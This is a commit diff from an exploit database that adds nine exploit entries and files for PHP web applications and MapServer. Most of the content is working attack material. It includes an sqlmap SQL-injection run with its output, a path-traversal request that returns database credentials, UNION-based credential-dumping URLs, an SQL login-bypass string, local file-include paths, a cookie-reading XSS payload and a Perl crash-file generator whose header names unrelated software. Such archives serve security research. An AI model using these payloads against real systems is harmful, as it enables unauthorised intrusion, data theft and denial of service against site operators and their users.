Update: 2015-02-18

9 new exploits

files.csv

@@ -32521,3 +32521,12 @@ id,file,description,date,author,platform,type,port
 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
 36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
 36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
+36089,platforms/php/webapps/36089.txt,"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities",2015-02-16,"Brandon Perry",php,webapps,80
+36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
+36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
+36092,platforms/windows/dos/36092.pl,"MapServer <= 6.0 Map File Double Free Remote Denial of Service Vulnerability",2011-08-30,rouault,windows,dos,0
+36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
+36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Include and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0
+36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
+36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
+36097,platforms/php/webapps/36097.txt,"Mambo CMS N-Skyrslur Cross Site Scripting Vulnerability",2011-09-02,CoBRa_21,php,webapps,0

platforms/php/webapps/36089.txt

@@ -0,0 +1,116 @@
+eTouch SamePage v4.4.0.0.239 multiple vulnerabilities
+
+
+http://www.etouch.net/products/samepage/index.html
+
+Enterprise trial was installed in an Ubuntu virtual machine with MySQL. By default, the listening port is 18080.
+
+Required on the Ubuntu machine to install the SamePage binary successfully:
+sudo apt-get install libstdc++6:i386 libc6:i386 libXext6:i386 mysql-server
+
+Trial available here:
+http://support.etouch.net/cm/wiki/?id=8889
+
+———
+
+Unauthenticated time-based SQL injection in /cm/blogrss/feed servlet
+
+The following URL is vulnerable to a time-based SQL injection in the catId parameter:
+
+http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600
+
+Exploitation with sqlmap:
+
+Brandons-iMac:sqlmap bperry$ ./sqlmap.py -u "http://192.168.1.25:18080/cm/blogrss/feed?entity=mostviewedpost&analyticsType=blog&catId=-1&count=10&et_cw=850&et_ch=600" --dbms=mysql -p catId --level=5 --risk=3 -o --technique=t --time-sec=10 --dbs
+         _
+ ___ ___| |_____ ___ ___  {1.0-dev-fd632e5}
+|_ -| . | |     | .'| . |
+|___|_  |_|_|_|_|__,|  _|
+      |_|           |_|   http://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting at 19:08:19
+
+[19:08:19] [INFO] testing connection to the target URL
+[19:08:19] [INFO] heuristics detected web page charset 'ascii'
+[19:08:19] [INFO] testing NULL connection to the target URL
+[19:08:19] [INFO] NULL connection is supported with HEAD header
+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
+---
+Parameter: catId (GET)
+    Type: AND/OR time-based blind
+    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
+    Payload: entity=mostviewedpost&analyticsType=blog&catId=-1) AND 6412=BENCHMARK(10000000,MD5(0x73764b7a)) AND (3198=3198&count=10&et_cw=850&et_ch=600
+---
+[19:08:19] [INFO] testing MySQL
+[19:08:19] [INFO] confirming MySQL
+[19:08:19] [INFO] the back-end DBMS is MySQL
+web application technology: JSP
+back-end DBMS: MySQL >= 5.0.0
+[19:08:19] [INFO] fetching database names
+[19:08:19] [INFO] fetching number of databases
+[19:08:19] [INFO] resumed: 4
+[19:08:19] [INFO] resumed: information_schema
+[19:08:19] [INFO] resumed: mysql
+[19:08:19] [INFO] resumed: performance_schema
+[19:08:19] [INFO] resumed: samepage
+available databases [4]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] samepage
+
+[19:08:19] [INFO] fetched data logged to text files under '/Users/bperry/.sqlmap/output/192.168.1.25'
+
+[*] shutting down at 19:08:19
+
+Brandons-iMac:sqlmap bperry$
+
+
+———
+Authenticated arbitrary file read via /cm/newui/blog/export.jsp
+
+The following authenticated GET request will read the cm.xml file from the web server installation directory, which contains the database credentials. While authentication is required, by default, creating a user using the user sign-up page is simple.
+
+
+Request:
+
+GET /cm/newui/blog/export.jsp?filepath=../conf/Catalina/localhost/cm.xml&start=true&et_cw=350&et_ch=100 HTTP/1.1
+Host: 192.168.1.22:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.22:8080/cm/newui/blog/export.jsp?pkey=64616d73657373696f6e696468616c6c61626f6c6c613b313432323331333135393433341422313179983&blogalias=fdsaffd&blogdesc=fdsafdsafdsa&starttime=1422313179983&start=true
+Cookie: JSESSIONID=8D2B23DCF68ACD2623B390942E71F2E5; c_wiki_browser=1
+Connection: keep-alive
+
+
+
+
+Response:
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Content-Disposition: attachment; filename=cm.xml
+Content-Type: application/zip
+Content-Length: 864
+Date: Tue, 27 Jan 2015 00:42:53 GMT
+
+<Context path="/cm" docBase="../../cm" debug="0" reloadable="false" crossContext="true" autodeploy="true">
+  <Resource name="CMPOOL" auth="Container"  type="com.atomikos.jdbc.nonxa.NonXADataSourceBean"  
+    factory="org.apache.naming.factory.BeanFactory"
+    uniqueResourceName="CMPOOL"
+     driverClassName="com.mysql.jdbc.Driver"
+    user="root"
+    password="password"
+    poolSize="10"
+    validatingQuery ="SELECT 1" 
+    url="jdbc:mysql://localhost:3306/samepage" />
+  <Transaction factory="com.atomikos.icatch.jta.UserTransactionFactory" />
+  <Resource name="UserTransaction" auth="Container" type="javax.transaction.UserTransaction"
+          factory="com.atomikos.icatch.jta.UserTransactionFactory" />
+  <Resource name="TransactionManager" auth="Container" type="com.atomikos.icatch.jta.UserTransactionManager"
+  factory="org.apache.naming.factory.BeanFactory" />    
+</Context>

platforms/php/webapps/36090.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/49361/info
+
+ClickCMS is prone to a denial-of-service vulnerability and a CAPTCHA-bypass vulnerability.
+
+Attackers can leverage these issues to cause the affected server to stop responding or to bypass certain security mechanisms. 
+
+http://www.example.com/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2
+http://www.example.com/captcha/CaptchaSecurityImages.php?width=1000&height=9000 

platforms/php/webapps/36091.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49364/info
+
+IBM Open Admin Tool is prone to multiple cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
+
+IBM Open Admin Tool 2.71 and prior are vulnerable. 
+
+http://www.example.com:8080/openadmin/index.php?act=login&do=dologin&login_admin=Login&groups=1&grouppass=&informixserver= &host= &port= &username= &userpass= &idsprotocol=onsoctcp&conn_num 

platforms/php/webapps/36093.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/49378/info
+
+CS-Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CS-Cart 2.2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/controllers/customer/products.php?tabs_group_id=[SQL INJECT] 

platforms/php/webapps/36094.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/49393/info
+
+TinyWebGallery is prone to multiple local file-include and SQL-injection vulnerabilities.
+
+An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
+
+TinyWebGallery 1.8.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/upload/tfu_213.swf?base=C:\windows\win.ini%00&lang=en
+http://www.example.com/admin/upload/tfu_upload.php?workaround_dir=../../../../../../../../httpd.conf%00
+http://www.example.com/admin/tfu_login.php?install_path=../../../../../../../../httpd.conf%00
+
+http://www.example.com/admin/upload/tfu_213.swf =>>
+=>> If login :
+-> Auth ByPass =
+-- user = ' or '=' or '
+-- pass = ' or '=' or ' 

platforms/php/webapps/36095.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49395/info
+
+Serendipity is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Serendipity 1.5.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/research_display.php?ID=47 and 1=1 //\\ http://www.aarda.org/research_display.php?ID=47 and 1=2
+
+http://www.example.com/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,group_concat%28user,0x3a,pass,0x3a,email%29,null,null,null+FROM+Admin 

platforms/php/webapps/36096.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49399/info
+
+Web Professional is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.examplecom/default.php?t=news&id=[SQL] 

platforms/php/webapps/36097.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49415/info
+
+Mambo CMS N-Skyrslur is prone to cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/[PATH]/index.php?option=com_n-skyrslur&Itemid=51&do=<script>alert(document.cookie)</script> 

platforms/windows/dos/36092.pl

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/49374/info
+
+MapServer is prone to a remote denial-of-service vulnerability due to a double free condition.
+
+Attackers can exploit this issue to crash the application, denying service to legitimate users. Due to the nature of this issue, code execution may be possible; however, this has not been confirmed.
+
+Versions prior to MapServer 6.0.1 are vulnerable. 
+
+#!/usr/bin/perl
+ 
+print q(
+########################################################
+# home : http://www.D99Y.com 
+# Date : 9/8/2011 
+# Author : NassRawI 
+# Software Link : http://www.acoustica.com/mixcraft/
+# Version : v1.00 Build 10 
+# Tested on : Windows XP SP2
+########################################################
+);
+ 
+my $file= "crash.mxc";
+my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ;
+open(d99y,">$file");
+print d99y $junk ;
+close(d99y);
+print "\n [ # ] Vulnerable File Created !\n"